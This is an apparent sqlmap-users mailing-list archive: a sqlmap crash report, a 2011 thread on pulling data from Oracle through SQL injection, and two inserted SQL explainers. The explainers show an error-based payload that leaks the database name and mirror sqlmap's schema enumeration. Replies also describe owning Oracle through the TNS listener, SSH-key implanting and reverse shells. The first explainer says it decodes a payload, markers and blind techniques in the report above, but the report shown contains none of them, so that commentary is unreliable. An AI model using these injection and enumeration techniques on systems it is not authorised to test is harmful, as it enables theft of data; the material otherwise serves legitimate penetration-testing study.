[19:35:15] [CRITICAL] connection exception detected. sqlmap will display partial output'page not found (404)'
[19:35:16] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 1 times, 500 (Internal Server Error) - 3 times

[19:35:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3952), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r3952)
Python version: 2.6.6
Operating system: posix
Command line: ./sqlmap.py -u ************************************************************ -T usuario -C ********************************************* --dump
Technique: ERROR
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 84, in main
    start()
  File "/home/sqlmap-dev/lib/controller/controller.py", line 526, in start
    action()
  File "/home/sqlmap-dev/lib/controller/action.py", line 109, in action
    conf.dbmsHandler.dumpTable()
  File "/home/sqlmap-dev/plugins/generic/enumeration.py", line 1470, in dumpTable
    self.getColumns(onlyColNames=True)
  File "/home/sqlmap-dev/plugins/generic/enumeration.py", line 1081, in getColumns
    if columnData[0] is not None:
TypeError: 'NoneType' object is unsubscriptable

[*] shutting down at: 19:35:1

-
Thanx! |
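The error-based payload in the report above is worth reading once de-obfuscated, because it shows how that technique actually moves data. The following T-SQL is an added example written for this page, not code from the thread or from sqlmap: it decodes the CHAR() chain, reproduces the conversion error the payload relies on, and generalises the same trick to a real value. The marker strings ':lvz:' and ':mjk:' are the ones encoded in the report; the DB_NAME() variant and the TRY/CATCH block are assumptions about the general form, not payloads taken from the thread.

```sql
-- Added example (not from the thread or sqlmap): how the error-based
-- payload in the report above leaks data through a conversion error.
-- Runs as-is in SSMS or sqlcmd against SQL Server 2005 or later.

-- 1. The CHAR() chain is only obfuscation of two random delimiters.
SELECT CHAR(58)+CHAR(108)+CHAR(118)+CHAR(122)+CHAR(58) AS open_marker,  -- ':lvz:'
       CHAR(58)+CHAR(109)+CHAR(106)+CHAR(107)+CHAR(58) AS close_marker; -- ':mjk:'

-- 2. sqlmap's detection payload, de-obfuscated. The CASE yields '1'
--    (CHAR(49)) because 3759=3759 is true, so the string becomes
--    ':lvz:1:mjk:'. CONVERT(INT, ...) cannot parse it and the engine
--    raises error 245:
--      Conversion failed when converting the varchar value ':lvz:1:mjk:'
--      to data type int.
--    The two markers let the tool pull the value out of that message with
--    a regular expression; the outer "3759=" comparison never runs.
SELECT CONVERT(INT, ':lvz:' + (SELECT CASE WHEN (3759=3759) THEN '1' ELSE '0' END) + ':mjk:');

-- 3. The same channel carrying data instead of a truth bit (assumption:
--    general form, not a payload from the thread). The error text now
--    contains ':lvz:<current database name>:mjk:'.
SELECT CONVERT(INT, ':lvz:' + DB_NAME() + ':mjk:');

-- Edge case: if the inner value is NULL the whole concatenation is NULL
-- and CONVERT(INT, NULL) succeeds silently, so "no error" can mean
-- "no value" rather than "not injectable".

-- 4. Why this depends on the application echoing database errors: with
--    the error swallowed, nothing reaches the client and an attacker is
--    pushed back to the slower blind techniques also listed in the report
--    (boolean-based and WAITFOR DELAY time-based).
BEGIN TRY
    SELECT CONVERT(INT, ':lvz:' + DB_NAME() + ':mjk:');
END TRY
BEGIN CATCH
    SELECT 'query failed' AS result;  -- generic text, ERROR_MESSAGE() not echoed
END CATCH;
```

Statements 2 and 3 are expected to fail with error 245; that failure is the point, and the error text is where the value appears.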
From: Chris O. <chr...@gm...> - 2011-05-25 11:13:48
|
Thanks James

I'll take a look and also pass this on to the rest of the team.

Cheers

Chris

On 25 May 2011 12:10, <ja...@ev...> wrote:
> Chris,
>
> If you like to learn about severely owning Oracle a nice place to start
> might be my blog =). http://security.is.doomed.org/wordpress/
>
> Also you can head over to a friend of mine's site,
> http://pentestmonkey.net/cheat-sheets/ for all types of good SQL injection
> cheat info. =)
>
> There is a nice article on exploiting a few methods of oracle. One is
> implanting a ssh key in a log file you control (you can change it to
> authorized_keys). The other method walks you through actually bruteforcing
> the database SID, cracking a login, then elevating to DB and running some
> Java programs to spawn a reverse connecting shell back to you.
>
> Honestly, if you ever respected Oracle... you won't after learning how to
> own the product.
>
> There's also some stuff on there about owning NFS, JBoss/Tomcat and a
> bunch of other junk. Also some code I wrote.
>
> James
>
> On Wed, 25 May 2011 11:39:22 +0100, Chris Oakley wrote:
>
>> Thanks for the assistance guys. I'll inspect the contents of that
>> schema specifically in that case. I should have mentioned that I
>> used --exclude-sysdbs with the --dbs flag, I think I just had doubts
>> about the results even so! Unfortunately there are no ports other
>> than 80 and 443 open so access to this is strictly through the web
>> application we're testing. I definitely need to learn more about
>> Oracle.
>>
>> Chris
>>
>> On 25 May 2011 11:29, wrote:
>>
>>> Chris,
>>>
>>> Before bothering with Sqlmap for the injection it might be worth it to
>>> check if you can actually access the Oracle instance remotely. You can
>>> do this by connecting to the database on port 1521, this is
>>> 'tnslistener'.
>>>
>>> If you can connect to 1521/tcp there are a lot of easier ways to
>>> manipulate/own the database without sqlmap. Probably quite a bit faster.
>>> Also, having access to TNS increases your chances by 50% of owning the
>>> underlying OS.
>>>
>>> James
>>>
>>> On Wed, 25 May 2011 11:16:29 +0100, Chris Oakley wrote:
>>> > Hi All
>>> >
>>> > Not a sqlmap question as such, but maybe someone can help. I've
>>> > found an sqli flaw in a test that has resulted in the following:
>>> >
>>> > ---
>>> > banner: 'Oracle Database 10g Enterprise Edition Release
>>> > 10.2.0.4.0 - 64bi'
>>> > current user is DBA: 'False'
>>> > current user: 'IFSSYS'
>>> >
>>> > available databases [4]:
>>> > [*] CTXSYS
>>> > [*] IFSSYS
>>> > [*] SYS
>>> > [*] SYSTEM
>>> > ---
>>> >
>>> > These all seem to be system databases. I don't know enough about
>>> > Oracle to know if 1) they are all sys dbs 2) if there's anywhere I can
>>> > go from here. The content of these databases seems to be all related
>>> > to privs and such within Oracle. What I'm looking for is the web app
>>> > data. Does anyone more familiar with Oracle know why it would only
>>> > be systems databases accessible through the sqli flaw?
>>> >
>>> > We can try other tactics later but I was just wondering if this is
>>> > normal from a data extraction point of view with Oracle. I've dumped
>>> > a fair amount of the data and there's nothing system-related so far...
>>> >
>>> > Cheers
>>> >
>>> > Chris
|
From: <ja...@ev...> - 2011-05-25 11:10:57
|
Chris,

If you like to learn about severely owning Oracle a nice place to start
might be my blog =). http://security.is.doomed.org/wordpress/

Also you can head over to a friend of mine's site,
http://pentestmonkey.net/cheat-sheets/ for all types of good SQL injection
cheat info. =)

There is a nice article on exploiting a few methods of oracle. One is
implanting a ssh key in a log file you control (you can change it to
authorized_keys). The other method walks you through actually bruteforcing
the database SID, cracking a login, then elevating to DB and running some
Java programs to spawn a reverse connecting shell back to you.

Honestly, if you ever respected Oracle... you won't after learning how to
own the product.

There's also some stuff on there about owning NFS, JBoss/Tomcat and a
bunch of other junk. Also some code I wrote.

James

On Wed, 25 May 2011 11:39:22 +0100, Chris Oakley wrote:
> Thanks for the assistance guys. I'll inspect the contents of that
> schema specifically in that case. I should have mentioned that I
> used --exclude-sysdbs with the --dbs flag, I think I just had doubts
> about the results even so! Unfortunately there are no ports other
> than 80 and 443 open so access to this is strictly through the web
> application we're testing. I definitely need to learn more about
> Oracle.
>
> Chris
>
> On 25 May 2011 11:29, wrote:
>
>> Chris,
>>
>> Before bothering with Sqlmap for the injection it might be worth it to
>> check if you can actually access the Oracle instance remotely. You can
>> do this by connecting to the database on port 1521, this is
>> 'tnslistener'.
>>
>> If you can connect to 1521/tcp there are a lot of easier ways to
>> manipulate/own the database without sqlmap. Probably quite a bit faster.
>> Also, having access to TNS increases your chances by 50% of owning the
>> underlying OS.
>>
>> James
>>
>> On Wed, 25 May 2011 11:16:29 +0100, Chris Oakley wrote:
>> > Hi All
>> >
>> > Not a sqlmap question as such, but maybe someone can help. I've
>> > found an sqli flaw in a test that has resulted in the following:
>> >
>> > ---
>> > banner: 'Oracle Database 10g Enterprise Edition Release
>> > 10.2.0.4.0 - 64bi'
>> > current user is DBA: 'False'
>> > current user: 'IFSSYS'
>> >
>> > available databases [4]:
>> > [*] CTXSYS
>> > [*] IFSSYS
>> > [*] SYS
>> > [*] SYSTEM
>> > ---
>> >
>> > These all seem to be system databases. I don't know enough about
>> > Oracle to know if 1) they are all sys dbs 2) if there's anywhere I can
>> > go from here. The content of these databases seems to be all related
>> > to privs and such within Oracle. What I'm looking for is the web app
>> > data. Does anyone more familiar with Oracle know why it would only
>> > be systems databases accessible through the sqli flaw?
>> >
>> > We can try other tactics later but I was just wondering if this is
>> > normal from a data extraction point of view with Oracle. I've dumped
>> > a fair amount of the data and there's nothing system-related so far...
>> >
>> > Cheers
>> >
>> > Chris
|
From: Chris O. <chr...@gm...> - 2011-05-25 10:39:30
|
Thanks for the assistance guys. I'll inspect the contents of that schema
specifically in that case. I should have mentioned that I used
--exclude-sysdbs with the --dbs flag, I think I just had doubts about the
results even so! Unfortunately there are no ports other than 80 and 443 open
so access to this is strictly through the web application we're testing. I
definitely need to learn more about Oracle.

Chris

On 25 May 2011 11:29, <ja...@ev...> wrote:
> Chris,
>
> Before bothering with Sqlmap for the injection it might be worth it to
> check if you can actually access the Oracle instance remotely. You can
> do this by connecting to the database on port 1521, this is
> 'tnslistener'.
>
> If you can connect to 1521/tcp there are a lot of easier ways to
> manipulate/own the database without sqlmap. Probably quite a bit faster. Also,
> having access to TNS increases your chances by 50% of owning the
> underlying OS.
>
> James
>
> On Wed, 25 May 2011 11:16:29 +0100, Chris Oakley wrote:
> > Hi All
> >
> > Not a sqlmap question as such, but maybe someone can help. I've
> > found an sqli flaw in a test that has resulted in the following:
> >
> > ---
> > banner: 'Oracle Database 10g Enterprise Edition Release
> > 10.2.0.4.0 - 64bi'
> > current user is DBA: 'False'
> > current user: 'IFSSYS'
> >
> > available databases [4]:
> > [*] CTXSYS
> > [*] IFSSYS
> > [*] SYS
> > [*] SYSTEM
> > ---
> >
> > These all seem to be system databases. I don't know enough about
> > Oracle to know if 1) they are all sys dbs 2) if there's anywhere I can
> > go from here. The content of these databases seems to be all related
> > to privs and such within Oracle. What I'm looking for is the web app
> > data. Does anyone more familiar with Oracle know why it would only
> > be systems databases accessible through the sqli flaw?
> >
> > We can try other tactics later but I was just wondering if this is
> > normal from a data extraction point of view with Oracle. I've dumped
> > a fair amount of the data and there's nothing system-related so far...
> >
> > Cheers
> >
> > Chris
|
From: <ja...@ev...> - 2011-05-25 10:29:28
|
Chris,

Before bothering with Sqlmap for the injection it might be worth it to
check if you can actually access the Oracle instance remotely. You can
do this by connecting to the database on port 1521, this is
'tnslistener'.

If you can connect to 1521/tcp there are a lot of easier ways to
manipulate/own the database without sqlmap. Probably quite a bit faster. Also,
having access to TNS increases your chances by 50% of owning the
underlying OS.

James

On Wed, 25 May 2011 11:16:29 +0100, Chris Oakley wrote:
> Hi All
>
> Not a sqlmap question as such, but maybe someone can help. I've
> found an sqli flaw in a test that has resulted in the following:
>
> ---
> banner: 'Oracle Database 10g Enterprise Edition Release
> 10.2.0.4.0 - 64bi'
> current user is DBA: 'False'
> current user: 'IFSSYS'
>
> available databases [4]:
> [*] CTXSYS
> [*] IFSSYS
> [*] SYS
> [*] SYSTEM
> ---
>
> These all seem to be system databases. I don't know enough about
> Oracle to know if 1) they are all sys dbs 2) if there's anywhere I can
> go from here. The content of these databases seems to be all related
> to privs and such within Oracle. What I'm looking for is the web app
> data. Does anyone more familiar with Oracle know why it would only
> be systems databases accessible through the sqli flaw?
>
> We can try other tactics later but I was just wondering if this is
> normal from a data extraction point of view with Oracle. I've dumped
> a fair amount of the data and there's nothing system-related so far...
>
> Cheers
>
> Chris
|
From: Miroslav S. <mir...@gm...> - 2011-05-25 10:25:59
|
p.s. in future for questions like this "if 1) they are all sys dbs" there is
a switch called:

--exclude-sysdbs

which will filter out all system database names from --dbs output

kr

On Wed, May 25, 2011 at 12:23 PM, Miroslav Stampar <mir...@gm...> wrote:
> hi Chris.
>
> Oracle has a rather different "concept" for databases (from dumping
> point of view).
>
> data is stored into "schemas" which are the same thing as "users", and
> each user has its tables under the same named schema.
>
> that means that your best bet would be to use the:
>
> --tables -D IFSSYS <--- current user name
> and then dump tables from there on
>
> also, be sure that you are using the latest revision from our repository
>
> kr
>
> On Wed, May 25, 2011 at 12:16 PM, Chris Oakley
> <chr...@gm...> wrote:
>> Hi All
>>
>> Not a sqlmap question as such, but maybe someone can help. I've found an
>> sqli flaw in a test that has resulted in the following:
>>
>> ---
>> banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 -
>> 64bi'
>> current user is DBA: 'False'
>> current user: 'IFSSYS'
>>
>> available databases [4]:
>> [*] CTXSYS
>> [*] IFSSYS
>> [*] SYS
>> [*] SYSTEM
>> ---
>>
>> These all seem to be system databases. I don't know enough about Oracle to
>> know if 1) they are all sys dbs 2) if there's anywhere I can go from here.
>> The content of these databases seems to be all related to privs and such
>> within Oracle. What I'm looking for is the web app data. Does anyone more
>> familiar with Oracle know why it would only be systems databases accessible
>> through the sqli flaw?
>>
>> We can try other tactics later but I was just wondering if this is normal
>> from a data extraction point of view with Oracle. I've dumped a fair amount
>> of the data and there's nothing system-related so far...
>>
>> Cheers
>>
>> Chris
>>
>
> --
> Miroslav Stampar
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
>

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B |
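Miroslav's point that Oracle "databases" in sqlmap output are really schemas, and a schema is just the objects a user owns, is easier to see from the data dictionary itself. The following Oracle SQL is an added example written for this page, not code from the thread or from sqlmap: it runs the same enumeration that --dbs, --exclude-sysdbs and --tables -D IFSSYS perform, using only ALL_* views, which is what a non-DBA account such as IFSSYS ('current user is DBA: False' in the thread) can read. CTXSYS, SYS, SYSTEM and IFSSYS come from the thread; the longer system-schema list and the placeholder table name SOME_TABLE are assumptions.

```sql
-- Added example (not from the thread or sqlmap): Oracle "databases" are
-- schemas, and a schema is the set of objects owned by one user. One
-- instance, one database, many schemas. Run in sqlplus or SQL Developer
-- as a non-DBA user; DBA_* views would need DBA privileges, ALL_* do not.

-- 1. Who am I, which schema resolves my unqualified names, and which
--    (single) database am I in?
SELECT SYS_CONTEXT('USERENV', 'CURRENT_USER')   AS current_user_name,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema,
       SYS_CONTEXT('USERENV', 'DB_NAME')        AS database_name
  FROM dual;

-- 2. Equivalent of --dbs: every owner with at least one table I may read.
--    ALL_TABLES is filtered by privilege, which is why a low-privileged
--    application account sees its own schema plus whatever SYS, SYSTEM and
--    CTXSYS tables are granted to PUBLIC, and nothing else.
SELECT DISTINCT owner
  FROM all_tables
 ORDER BY owner;

-- 3. Equivalent of --exclude-sysdbs: drop Oracle-supplied schemas.
--    CTXSYS, SYS and SYSTEM are the ones seen in the thread; the rest of
--    the list is an assumption covering common 10g built-in accounts and
--    is not a complete catalogue.
SELECT DISTINCT owner
  FROM all_tables
 WHERE owner NOT IN ('SYS', 'SYSTEM', 'CTXSYS', 'MDSYS', 'XDB',
                     'WMSYS', 'OUTLN', 'DBSNMP', 'EXFSYS', 'ORDSYS')
 ORDER BY owner;

-- 4. Equivalent of --tables -D IFSSYS: tables owned by the schema the
--    application connects as. NUM_ROWS is the optimizer statistic, so it
--    is a cheap pointer to where the data lives, not an exact count.
SELECT table_name, num_rows
  FROM all_tables
 WHERE owner = 'IFSSYS'
 ORDER BY num_rows DESC NULLS LAST;

-- 5. Columns of one table, which is what -C takes on the sqlmap side.
--    SOME_TABLE is a placeholder (assumption), not a name from the thread.
SELECT column_name, data_type, data_length
  FROM all_tab_columns
 WHERE owner = 'IFSSYS'
   AND table_name = 'SOME_TABLE'
 ORDER BY column_id;
```

Schema names are stored upper-case unless they were created quoted, so pass them to -D in upper case; and if step 2 returns only the four owners from the thread, the application data is in the one that is not Oracle-supplied, exactly as Miroslav suggests.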